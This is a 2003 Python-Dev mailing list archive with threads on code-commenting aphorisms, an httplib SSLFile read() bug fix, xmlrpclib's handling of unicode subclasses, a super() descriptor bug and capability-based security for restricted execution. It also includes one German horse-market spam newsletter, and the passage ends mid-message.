Comment generously, the best modules are an education to read.
Be kind on the Usenet some posters are only eleven.


Raymond Hettinger


From mwh@python.net  Thu Mar  6 11:36:58 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 06 Mar 2003 11:36:58 +0000
Subject: [Python-Dev] More Zen
In-Reply-To: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer> ("Raymond
 Hettinger"'s message of "Thu, 6 Mar 2003 06:12:54 -0500")
References: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer>
Message-ID: <2mk7fc20bp.fsf@starship.python.net>

"Raymond Hettinger" <raymond.hettinger@verizon.net> writes:

[snip stuff I agree with]

> Comment generously, the best modules are an education to read.

This one I have mild issues with.  Ideally, your code is so clear that
it requires no comments to read!  And information for users of the
code should be in docstrings.  If you're implementing a non-obvious
algorithm then there's a place for a comment block educating the
reader how it works, but I'm leery of anything that might seem to
encourage the

    i = i + 1 # add one to i

school of commenting.

Cheers,
M.

-- 
  Our lecture theatre has just crashed. It will currently only
  silently display an unexplained line-drawing of a large dog
  accompanied by spookily flickering lights.
     -- Dan Sheppard, ucam.chat (from Owen Dunn's summary of the year)


From mchermside@ingdirect.com  Thu Mar  6 13:09:56 2003
From: mchermside@ingdirect.com (Chermside, Michael)
Date: Thu, 6 Mar 2003 08:09:56 -0500
Subject: [Python-Dev] Re: More Zen
Message-ID: <7F171EB5E155544CAC4035F0182093F03CF76E@INGDEXCHSANC1.ingdirect.com>

Raymond:

I particularly like your last zen point:

> Be kind on the Usenet some posters are only eleven.

I like it for two reasons... one, being that it's an important
truth (as recently illustrated ;-)), but secondly that it
reminds us that Python is more than a language... it also
includes a very strong and helpful community without which
all the design principles in the world would never lead to
such a successful language.

-- Michael Chermside


From webmaster@pferdemarkt.ws  Thu Mar  6 14:13:07 2003
From: webmaster@pferdemarkt.ws (webmaster@pferdemarkt.ws)
Date: Thu, 6 Mar 2003 06:13:07 -0800
Subject: [Python-Dev] Pferdemarkt.ws informiert! Newsletter 03/2003 http://www.pferdemarkt.ws
Message-ID: <200303061413.GAA26296@eagle.he.net>

http://www.pferdemarkt.ws

Wir sind in 2003 erfolgreich in des neue \"Pferdejahr 2003 gestartet.

F�r den schnellen Erfolg unseres Marktes m�chten wir uns bei Ihnen bedanken.

Heute am 06.03.2003 sind wir gut 2 Monate Online!

T�glich w�chst unsere Datenbank um  30  Neue Angebote.

Stellen auch Sie als Privatperson Ihre zu verkaufenden Pferde direkt und

vollkommen kostenlos ins Internet.

Zur besseren Sichtbarmachung Ihrer Angebote k�nnen Sie bis zu ein Bild zu Ihrer

Pferdeanzeige kostenlos einstellen!

Wollen Sie direkt auf die erste Seite, dann k�nnen wir Ihnen unser Bonussystem empfehlen.

klicken Sie hier: 

http://www.pferdemarkt.ws/bestellung.html 

Ihr http://Pferdemarkt.ws Team


Klicken Sie hier um sich direkt einzuloggen http://www.Pferdemarkt.ws

Kostenlos Anbieten, Kostenlos Suchen! Direkt von Privat zu Privat!

Haben Sie noch Fragen mailto: webmaster@pferdemarkt.ws


From jacobs@penguin.theopalgroup.com  Thu Mar  6 15:18:48 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 10:18:48 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
Message-ID: <Pine.LNX.4.44.0303060913160.2595-100000@penguin.theopalgroup.com>

Hi all,

SourceForge isn't letting me in, so I'm dropping a note here to report that
Raymond Hettinger's changes to httplib.py (Rev 1.72 on Wed Feb 26 22:45:18
2003 UTC) have broken the read() method on the SSLFile object.  I suspect
that he was trying to be clever by adding iterators to code that worked just
fine (if not better) without them.  Unfortunately, clever code has to be
tested.  The diff below repairs it, though I'd be just as happy if that part
of Rev 1.72 was reverted.

--- httplib.py.orig     2003-03-05 19:37:28.000000000 -0500
+++ httplib.py  2003-03-06 10:11:01.000000000 -0500
@@ -864,13 +864,15 @@

     def read(self, size=None):
         L = [self._buf]
+        self._buf = ''
         if size is None:
-            self._buf = ''
             for s in iter(self._read, ""):
                 L.append(s)
-            return "".join(L)
         else:
-            avail = len(self._buf)
+            avail = len(L[0])
+            if avail >= size:
+                self._buf = L[0][size:]
+                return L[0][:size]
             for s in iter(self._read, ""):
                 L.append(s)
                 avail += len(s)
@@ -878,14 +880,19 @@
                     all = "".join(L)
                     self._buf = all[size:]
                     return all[:size]
+        return "".join(L)

     def readline(self):
         L = [self._buf]
         self._buf = ''
+        i = L[0].find("\n") + 1
+        if i > 0:
+            self._buf = L[0][i:]
+            return L[0][:i]
         for s in iter(self._read, ""):
             L.append(s)
-            if "\n" in s:
-                i = s.find("\n") + 1
+            i = s.find("\n") + 1
+            if i > 0:
                 self._buf = s[i:]
                 L[-1] = s[:i]
                 break

Regards,
-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From python@rcn.com  Thu Mar  6 15:33:21 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 10:33:21 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
References: <Pine.LNX.4.44.0303060913160.2595-100000@penguin.theopalgroup.com>
Message-ID: <002301c2e3f5$b84641e0$5c10a044@oemcomputer>

I'll put in your SF report and fix it.

Raymond

----- Original Message ----- 
From: "Kevin Jacobs" <jacobs@penguin.theopalgroup.com>
To: <python-dev@python.org>; "Raymond Hettinger" <python@rcn.com>
Sent: Thursday, March 06, 2003 10:18 AM
Subject: [Python-Dev] httplib SSLFile broken in CVS


> Hi all,
> 
> SourceForge isn't letting me in, so I'm dropping a note here to report that
> Raymond Hettinger's changes to httplib.py (Rev 1.72 on Wed Feb 26 22:45:18
> 2003 UTC) have broken the read() method on the SSLFile object.  I suspect
> that he was trying to be clever by adding iterators to code that worked just
> fine (if not better) without them.  Unfortunately, clever code has to be
> tested.  The diff below repairs it, though I'd be just as happy if that part
> of Rev 1.72 was reverted.
> 
> --- httplib.py.orig     2003-03-05 19:37:28.000000000 -0500
> +++ httplib.py  2003-03-06 10:11:01.000000000 -0500
> @@ -864,13 +864,15 @@
> 
>      def read(self, size=None):
>          L = [self._buf]
> +        self._buf = ''
>          if size is None:
> -            self._buf = ''
>              for s in iter(self._read, ""):
>                  L.append(s)
> -            return "".join(L)
>          else:
> -            avail = len(self._buf)
> +            avail = len(L[0])
> +            if avail >= size:
> +                self._buf = L[0][size:]
> +                return L[0][:size]
>              for s in iter(self._read, ""):
>                  L.append(s)
>                  avail += len(s)
> @@ -878,14 +880,19 @@
>                      all = "".join(L)
>                      self._buf = all[size:]
>                      return all[:size]
> +        return "".join(L)
> 
>      def readline(self):
>          L = [self._buf]
>          self._buf = ''
> +        i = L[0].find("\n") + 1
> +        if i > 0:
> +            self._buf = L[0][i:]
> +            return L[0][:i]
>          for s in iter(self._read, ""):
>              L.append(s)
> -            if "\n" in s:
> -                i = s.find("\n") + 1
> +            i = s.find("\n") + 1
> +            if i > 0:
>                  self._buf = s[i:]
>                  L[-1] = s[:i]
>                  break
> 
> Regards,
> -Kevin
> 
> -- 
> --
> Kevin Jacobs
> The OPAL Group - Enterprise Systems Architect
> Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
> Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com
> 
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev


From jacobs@penguin.theopalgroup.com  Thu Mar  6 15:40:10 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 10:40:10 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <002301c2e3f5$b84641e0$5c10a044@oemcomputer>
Message-ID: <Pine.LNX.4.44.0303061037240.2595-100000@penguin.theopalgroup.com>

On Thu, 6 Mar 2003, Raymond Hettinger wrote:
> I'll put in your SF report and fix it.

Thanks.  Let me know if you'd like me to test any additional changes, since
I have a large test suite for my applications that uses httplib+SSL
extensively.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From python@rcn.com  Thu Mar  6 15:52:22 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 10:52:22 -0500
Subject: [Python-Dev] More Zen
References: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer> <2mk7fc20bp.fsf@starship.python.net>
Message-ID: <003101c2e3f8$60cdf4a0$5c10a044@oemcomputer>

From: "Michael Hudson" <mwh@python.net>
> > Comment generously, the best modules are an education to read.
> 
> This one I have mild issues with.  Ideally, your code is so clear that
> it requires no comments to read!  And information for users of the
> code should be in docstrings.  If you're implementing a non-obvious
> algorithm then there's a place for a comment block educating the
> reader how it works, but I'm leery of anything that might seem to
> encourage the  "i = i + 1 # add one to i"

This ought to be more clear:

   Reading heapq and timeit makes you smart -- let's comment like that.
 

Raymond Hettinger


From neal@metaslash.com  Thu Mar  6 15:57:06 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Thu, 06 Mar 2003 10:57:06 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <Pine.LNX.4.44.0303061037240.2595-100000@penguin.theopalgroup.com>
References: <002301c2e3f5$b84641e0$5c10a044@oemcomputer>
 <Pine.LNX.4.44.0303061037240.2595-100000@penguin.theopalgroup.com>
Message-ID: <20030306155706.GE1093@epoch.metaslash.com>

On Thu, Mar 06, 2003 at 10:40:10AM -0500, Kevin Jacobs wrote:
> 
> Thanks.  Let me know if you'd like me to test any additional changes, since
> I have a large test suite for my applications that uses httplib+SSL
> extensively.

Kevin,

Any chance we could get you to augment the regression tests?
It would be very helpful.

Neal


From bbum@codefab.com  Thu Mar  6 14:51:55 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 09:51:55 -0500
Subject: [Python-Dev] xmlrpclib
Message-ID: <2C8338BE-4FE3-11D7-AD53-000393877AE4@codefab.com>

Is there active work on the xmlrpclib module these days?   The 
HTTPTransport patch/addition should likely go out with 2.3 as it adds 
easy authentication and proxy support to xmlrpclib.

Also, the unicode support in xmlrpclib is broken in that it can't 
handle subclasses of <type 'unicode'>.

b.bum


From jacobs@penguin.theopalgroup.com  Thu Mar  6 16:49:18 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 11:49:18 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <20030306155706.GE1093@epoch.metaslash.com>
Message-ID: <Pine.LNX.4.44.0303061120260.2595-100000@penguin.theopalgroup.com>

On Thu, 6 Mar 2003, Neal Norwitz wrote:
> On Thu, Mar 06, 2003 at 10:40:10AM -0500, Kevin Jacobs wrote:
> > Thanks.  Let me know if you'd like me to test any additional changes, since
> > I have a large test suite for my applications that uses httplib+SSL
> > extensively.
>
> Any chance we could get you to augment the regression tests?
> It would be very helpful.

How many people run the regression suite with 'network' enabled?  If nobody
does, then it will be a waste of time to add it.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From skip@pobox.com  Thu Mar  6 16:50:48 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 6 Mar 2003 10:50:48 -0600
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <2C8338BE-4FE3-11D7-AD53-000393877AE4@codefab.com>
References: <2C8338BE-4FE3-11D7-AD53-000393877AE4@codefab.com>
Message-ID: <15975.31848.141376.614323@montanaro.dyndns.org>

    Bill> Is there active work on the xmlrpclib module these days?  The
    Bill> HTTPTransport patch/addition should likely go out with 2.3 as it
    Bill> adds easy authentication and proxy support to xmlrpclib.

Can you provide a SF id?  I can't seem to find it.

    Bill> Also, the unicode support in xmlrpclib is broken in that it can't 
    Bill> handle subclasses of <type 'unicode'>.

Does it handle subclasses of str?

Skip


From python@rcn.com  Thu Mar  6 16:55:57 2003
From: python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 11:55:57 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
References: <Pine.LNX.4.44.0303061120260.2595-100000@penguin.theopalgroup.com>
Message-ID: <009701c2e401$4287ee20$5c10a044@oemcomputer>

> How many people run the regression suite with 'network' enabled?  If nobody
> does, then it will be a waste of time to add it.

I *always* run the suit with network enabled and it only
takes one person running a suite to detect an error.
Also, everyone who makes a change to a network resource
should be running the tests with network enabled (at least
for that particular change).

IOW, it is definitely not a waste of time.


Raymond Hettinger

#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From bbum@codefab.com  Thu Mar  6 17:10:42 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 12:10:42 -0500
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <15975.31848.141376.614323@montanaro.dyndns.org>
Message-ID: <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>

On Thursday, Mar 6, 2003, at 11:50 US/Eastern, Skip Montanaro wrote:
>     Bill> Is there active work on the xmlrpclib module these days?  The
>     Bill> HTTPTransport patch/addition should likely go out with 2.3 
> as it
>     Bill> adds easy authentication and proxy support to xmlrpclib.
>
> Can you provide a SF id?  I can't seem to find it.

It had been closed or moved out of the SF bug queue by Fred about the 
same time he left python-dev, I believe.     I had sent the 
HTTPTransport source to Fred, but that sounds like a dead end these 
days.

Found it: 648658

>     Bill> Also, the unicode support in xmlrpclib is broken in that it 
> can't
>     Bill> handle subclasses of <type 'unicode'>.
>
> Does it handle subclasses of str?

I haven't tested, but looking at the implementation, I don't think it 
will.

In my case, I'm using xmlrpclib in the context of a Cocoa/Python based 
application that frequently uses Objective-C sourced strings as a part 
of the RPC request.  The PyObjC bridge now bridges NSStrings as a 
subclass of unicode.

Currently, the Marshaller class in xmlrpclib builds a simple dictionary 
of types used to encode raw objects to XML.

class Marshaller:
     ...
     dispatch = {}
     ...
     def dump_string(self, value, escape=escape):
         self.write("<value><string>%s</string></value>\n" % 
escape(value))
     dispatch[StringType] = dump_string
     if unicode:
         def dump_unicode(self, value, escape=escape):
             value = value.encode(self.encoding)
             self.write("<value><string>%s</string></value>\n" % 
escape(value))
         dispatch[UnicodeType] = dump_unicode
     ...

Where the dump method is:

     def __dump(self, value):
         try:
             f = self.dispatch[type(value)]
         except KeyError:
             raise TypeError, "cannot marshal %s objects" % type(value)
         else:
             f(self, value)

So, no, it doesn't do subclasses properly.  The workaround [for me] was 
easy... and bogus:

import xmlrpclib
Marshaller.dispatch[type(NSString.stringWithString_(''))] = 
Marshaller.dispatch[type(u'')]

b.bum


From jacobs@penguin.theopalgroup.com  Thu Mar  6 17:10:52 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Thu, 6 Mar 2003 12:10:52 -0500 (EST)
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <009701c2e401$4287ee20$5c10a044@oemcomputer>
Message-ID: <Pine.LNX.4.44.0303061205250.2595-100000@penguin.theopalgroup.com>

On Thu, 6 Mar 2003, Raymond Hettinger wrote:
> > How many people run the regression suite with 'network' enabled?  If nobody
> > does, then it will be a waste of time to add it.
> 
> IOW, it is definitely not a waste of time.

Great!  (Until today I didn't even know how to enable the network resource)

I'll submit a patch to test_socket_ssl, since it is already using urllib.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com


From klm@zope.com  Thu Mar  6 17:15:09 2003
From: klm@zope.com (Ken Manheimer)
Date: Thu, 6 Mar 2003 12:15:09 -0500 (EST)
Subject: [Python-Dev] More Zen
In-Reply-To: <2mk7fc20bp.fsf@starship.python.net>
Message-ID: <Pine.LNX.4.44.0303061209280.7291-100000@korak.zope.com>

On Thu, 6 Mar 2003, Michael Hudson wrote:

> "Raymond Hettinger" <raymond.hettinger@verizon.net> writes:
> 
> [snip stuff I agree with]
> 
> > Comment generously, the best modules are an education to read.
> 
> This one I have mild issues with.  Ideally, your code is so clear that
> it requires no comments to read!  And information for users of the
> code should be in docstrings.  If you're implementing a non-obvious
> algorithm then there's a place for a comment block educating the
> reader how it works, but I'm leery of anything that might seem to
> encourage the
> 
>     i = i + 1 # add one to i
> 
> school of commenting.

I expect that _sometimes_ some code cannot be clear, even on occasions
when the algorithm is not, as a whole, particularly abstruse.  I
agree, though, that unnecessary comments are harmful.  How about
framing it like this:

  Comment obscure code, let the obvious speak for itself.

-- 
Ken
klm@zope.com


From fdrake@acm.org  Thu Mar  6 17:19:47 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 6 Mar 2003 12:19:47 -0500
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>
References: <15975.31848.141376.614323@montanaro.dyndns.org>
 <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>
Message-ID: <15975.33587.890152.791815@grendel.zope.com>

Bill Bumgarner writes:
 > It had been closed or moved out of the SF bug queue by Fred about the 
 > same time he left python-dev, I believe.     I had sent the 
 > HTTPTransport source to Fred, but that sounds like a dead end these 
 > days.

Sorry; I've just been really busy on other things.  I'm on python-dev
these days, though I skim the messages very quickly.

 > Found it: 648658
...
 > I haven't tested, but looking at the implementation, I don't think it 
 > will.

I wish you were wrong on this, but I don't think you are.  ;-(

 > In my case, I'm using xmlrpclib in the context of a Cocoa/Python based 
 > application that frequently uses Objective-C sourced strings as a part 
 > of the RPC request.  The PyObjC bridge now bridges NSStrings as a 
 > subclass of unicode.
...
 > So, no, it doesn't do subclasses properly.  The workaround [for me] was 
 > easy... and bogus:
 > 
 > import xmlrpclib
 > Marshaller.dispatch[type(NSString.stringWithString_(''))] = 
 > Marshaller.dispatch[type(u'')]

Yeah, not too pretty.

For things like this, where some manner of dispatch is needed based on
type, but the type itself doesn't provide some appropriate method,
there's a real problem associating the right bit of code, and I'm
quite torn as to the right approach to take.  ;-(


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From skip@pobox.com  Thu Mar  6 17:35:00 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 6 Mar 2003 11:35:00 -0600
Subject: [Python-Dev] xmlrpclib
In-Reply-To: <15975.33587.890152.791815@grendel.zope.com>
References: <15975.31848.141376.614323@montanaro.dyndns.org>
 <8FEDD9EF-4FF6-11D7-AD53-000393877AE4@codefab.com>
 <15975.33587.890152.791815@grendel.zope.com>
Message-ID: <15975.34500.180179.410897@montanaro.dyndns.org>

    Fred> For things like this, where some manner of dispatch is needed
    Fred> based on type, but the type itself doesn't provide some
    Fred> appropriate method, there's a real problem associating the right
    Fred> bit of code, and I'm quite torn as to the right approach to take.

Slower in some cases, but couldn't you walk up the __bases__ chain until you
pop off the top or hit a match in the dispatch dict?

For stuff like the NSString stuff, perhaps adding a registration function to
the marshaller would be appropriate.  Of course, there's the problem coming
out the other side.  Does it matter if you put in a subclass of str and get
out a plain old str?

Also, xmlrpclib is built to take advantage of a number of speedup helper
modules.  In production usage I've found it unbearably slow if used without
sgmlop, for example.  I'd hate to have the default situation work and have
it fail if a speedup module was added to the system.

Skip


From pedronis@bluewin.ch  Thu Mar  6 17:21:40 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Thu, 6 Mar 2003 18:21:40 +0100
Subject: [Python-Dev] super() bug (?)
Message-ID: <009e01c2e404$da3677c0$6d94fea9@newmexico>

>>> class C(object):
...  def f(self): pass
...
>>> class D(C): pass
...
>>> D.f
<unbound method D.f>
>>> super(D,D).f
<bound method D.f of <class '__main__.D'>>

I think this should produce the same thing as D.f,

that means implementation-wise

f.__get__(None,D) should be called

not f.__get__(D,D).

_.__get__(None,D) would still do the right thing for static AND class methods:

>>> def g(cls): pass
...
>>> classmethod(g).__get__(None,D)
<bound method type.g of <class '__main__.D'>>


From bbum@codefab.com  Thu Mar  6 17:48:22 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 12:48:22 -0500
Subject: [Python-Dev] xmlrpclib: Apology
In-Reply-To: <15975.33587.890152.791815@grendel.zope.com>
Message-ID: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>

On Thursday, Mar 6, 2003, at 12:19 US/Eastern, Fred L. Drake, Jr. wrote:
> I wish you were wrong on this, but I don't think you are.  ;-(

Fred:  I apologize [publically]..... my bad.   I was mistaking you for 
the other Fred.

In any case, let me know what I can do to contribute to the effort.

b.bum


From fdrake@acm.org  Thu Mar  6 18:05:18 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 6 Mar 2003 13:05:18 -0500
Subject: [Python-Dev] Re: xmlrpclib: Apology
In-Reply-To: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
References: <15975.33587.890152.791815@grendel.zope.com>
 <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
Message-ID: <15975.36318.538470.221747@grendel.zope.com>

Bill Bumgarner writes:
 > On Thursday, Mar 6, 2003, at 12:19 US/Eastern, Fred L. Drake, Jr. wrote:
 > > I wish you were wrong on this, but I don't think you are.  ;-(
 > 
 > Fred:  I apologize [publically]..... my bad.   I was mistaking you for 
 > the other Fred.

Aha!  Yeah, I think both Fredrik and myself have been transmogrified
into black holes, even though you meant Fredrik.

 > In any case, let me know what I can do to contribute to the effort.

We'll, patches are cool.  ;-)  I have a number of other things that
need to be dealt with in other projects still, though I'm glad to help
out with xmlrpclib.  (There are definately some Expat matters to deal
with.)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From tim.one@comcast.net  Thu Mar  6 18:42:33 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 06 Mar 2003 13:42:33 -0500
Subject: [Python-Dev] httplib SSLFile broken in CVS
In-Reply-To: <Pine.LNX.4.44.0303061120260.2595-100000@penguin.theopalgroup.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEDFFBAA.tim.one@comcast.net>

[Kevin Jacobs]
> How many people run the regression suite with 'network' enabled?

FYI, I always do on Windows, unless I'm running tests on an unconnected
laptop.


From erik@pythonware.com  Thu Mar  6 18:59:28 2003
From: erik@pythonware.com (erik heneryd)
Date: Thu, 06 Mar 2003 19:59:28 +0100
Subject: [Python-Dev] xmlrpclib: Apology
In-Reply-To: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
References: <D33BAAC1-4FFB-11D7-BF05-000393877AE4@codefab.com>
Message-ID: <3E679A90.7030403@pythonware.com>

Bill Bumgarner wrote:

> Fred:  I apologize [publically]..... my bad.   I was mistaking you for 
> the other Fred. 

In Sweden, Fred is not a very common nickname for Fredrik. In fact I 
don't know if I ever heard of a Fred-Fredrik. This includes the bot 
himself, who just smiles when someone calls him Fred (or Frederick or 
something). :-)

        Erik


From bbum@codefab.com  Thu Mar  6 18:55:59 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Thu, 6 Mar 2003 13:55:59 -0500
Subject: [Python-Dev] xmlrpclib: Apology
In-Reply-To: <3E679A90.7030403@pythonware.com>
Message-ID: <44DEFB74-5005-11D7-BF05-000393877AE4@codefab.com>

On Thursday, Mar 6, 2003, at 13:59 US/Eastern, erik heneryd wrote:
> In Sweden, Fred is not a very common nickname for Fredrik. In fact I 
> don't know if I ever heard of a Fred-Fredrik. This includes the bot 
> himself, who just smiles when someone calls him Fred (or Frederick or 
> something). :-)

I'm just a hillbilly from the midwest of the US... I wouldn't know. ;-)


From jeremy@zope.com  Thu Mar  6 20:14:17 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 06 Mar 2003 15:14:17 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <3E635BD3.9000107@algroup.co.uk>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk>
Message-ID: <1046981657.15348.80.camel@slothrop.zope.com>

On Mon, 2003-03-03 at 08:42, Ben Laurie wrote:
> > I think the fundamental problem for rexec is that you don't have a
> > security kernel.  The code for security gets scatter throughout the
> > interpreter.  It's hard to have much assurance in the security when
> > its tangled up with everything else in the language.
> > 
> > You can use a proxy for an object to deal with goal #1 above --
> > enforce an interface for an object.  I think about this much like a
> > hardware capability architecture.  The protected objects live in the
> > capability segment and regular code can't access them directly.  The
> > only access is via a proxy object that is bound to the capability.
> > 
> > Regardless of proxy vs. rexec, I'd be interested to hear what you
> > think about a sound way to engineer a secure Python.
> 
> I'm told that proxies actually rely on rexec, too. So, I guess whichever 
> approach you take, you need rexec.
> 
> The problem is that although you can think about proxies as being like a 
> segmented architecture, you have to enforce that segmentation. And that 
> means doing so throughout the interpreter, doesn't it? I suppose it 
> might be possible to abstract things in some way to make that less 
> widespread, but probably not without having an adverse impact on speed.

The boundary between the interpreter and the proxy is the generic type
object API.  The Python code does not know anything about the
representation of a proxy object, except that it is a PyObject *.  As a
result, the only way to invoke operations on its is to go through the
various APIs in the type object's table of function pointers.

There are surely limits to how far the separation can go.  I expect you
can't inherit from a proxy for a class, such that the base class is in a
different protection domain than the subclass.  But I think there are
fewer ad hoc restrictions than there are in rexec.

I think this provides a pretty clean separation of concerns, even if the
proxy object were a standard part of Python.  The only code that should
manipulate the proxy representation is its implementation.  The only
other step would be to convince yourself that Python does not inspect
arbitrary parts of a concrete PyObject * in an unsafe way.

Jeremy


From ben@algroup.co.uk  Fri Mar  7 14:21:40 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Fri, 07 Mar 2003 14:21:40 +0000
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <1046981657.15348.80.camel@slothrop.zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com>	 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>	 <15933.30607.900530.370402@localhost.localdomain>	 <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com>
Message-ID: <3E68AAF4.3060508@algroup.co.uk>

Jeremy Hylton wrote:
> On Mon, 2003-03-03 at 08:42, Ben Laurie wrote:
> 
>>>I think the fundamental problem for rexec is that you don't have a
>>>security kernel.  The code for security gets scatter throughout the
>>>interpreter.  It's hard to have much assurance in the security when
>>>its tangled up with everything else in the language.
>>>
>>>You can use a proxy for an object to deal with goal #1 above --
>>>enforce an interface for an object.  I think about this much like a
>>>hardware capability architecture.  The protected objects live in the
>>>capability segment and regular code can't access them directly.  The
>>>only access is via a proxy object that is bound to the capability.
>>>
>>>Regardless of proxy vs. rexec, I'd be interested to hear what you
>>>think about a sound way to engineer a secure Python.
>>
>>I'm told that proxies actually rely on rexec, too. So, I guess whichever 
>>approach you take, you need rexec.
>>
>>The problem is that although you can think about proxies as being like a 
>>segmented architecture, you have to enforce that segmentation. And that 
>>means doing so throughout the interpreter, doesn't it? I suppose it 
>>might be possible to abstract things in some way to make that less 
>>widespread, but probably not without having an adverse impact on speed.
> 
> 
> The boundary between the interpreter and the proxy is the generic type
> object API.  The Python code does not know anything about the
> representation of a proxy object, except that it is a PyObject *.  As a
> result, the only way to invoke operations on its is to go through the
> various APIs in the type object's table of function pointers.
> 
> There are surely limits to how far the separation can go.  I expect you
> can't inherit from a proxy for a class, such that the base class is in a
> different protection domain than the subclass.  But I think there are
> fewer ad hoc restrictions than there are in rexec.
> 
> I think this provides a pretty clean separation of concerns, even if the
> proxy object were a standard part of Python.  The only code that should
> manipulate the proxy representation is its implementation.  The only
> other step would be to convince yourself that Python does not inspect
> arbitrary parts of a concrete PyObject * in an unsafe way.

I'm obviously missing something - surely you can say pretty much exactly 
the same thing about a bound method, just replace "type object" with 
"PyMethodObject"?

And in either case, you also need to restrict access to the underlying 
libraries and (presumably) some of the builtin functions?

BTW, Guido pointed out to me that I'm causing confusion by saying 
"rexec" when I really mean "restricted execution".

In short, it seems to me that proxies and capabilities via bound methods 
both do the same basic thing: i.e. prevent inspection of what is behind 
the capability/proxy. Proxies add access control to decide whether you 
get to use them or not, whereas in a capability system simple posession 
of the capability is sufficient (i.e. they are like a proxy where the 
security check always says "yes"). You do access control using 
capabilities, instead of inside them.

Am I not understanding proxies?

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Fri Mar  7 17:41:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 07 Mar 2003 12:41:16 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Fri, 07 Mar 2003 15:42:13 GMT."
 <3E68BDD5.5020608@algroup.co.uk>
Message-ID: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>

[Moving a discussion about capabilities to where it arguably belongs]

[Ben Laurie]
> The point about capabilities is that mere possession of a capability is 
> all that is required to exercise it. If you start adding security 
> checkers to them, then you don't have capabilities anymore. But the 
> point is somewhat deeper that than - given capabilities, you can 
> implement proxies without requiring any more infrastructure - you can 
> also implement security schemes that don't really correspond to any kind 
> of security checking at all (ok, you can probably find some convoluted 
> way to achieve the same effect, but I'll bet it comes down to having 
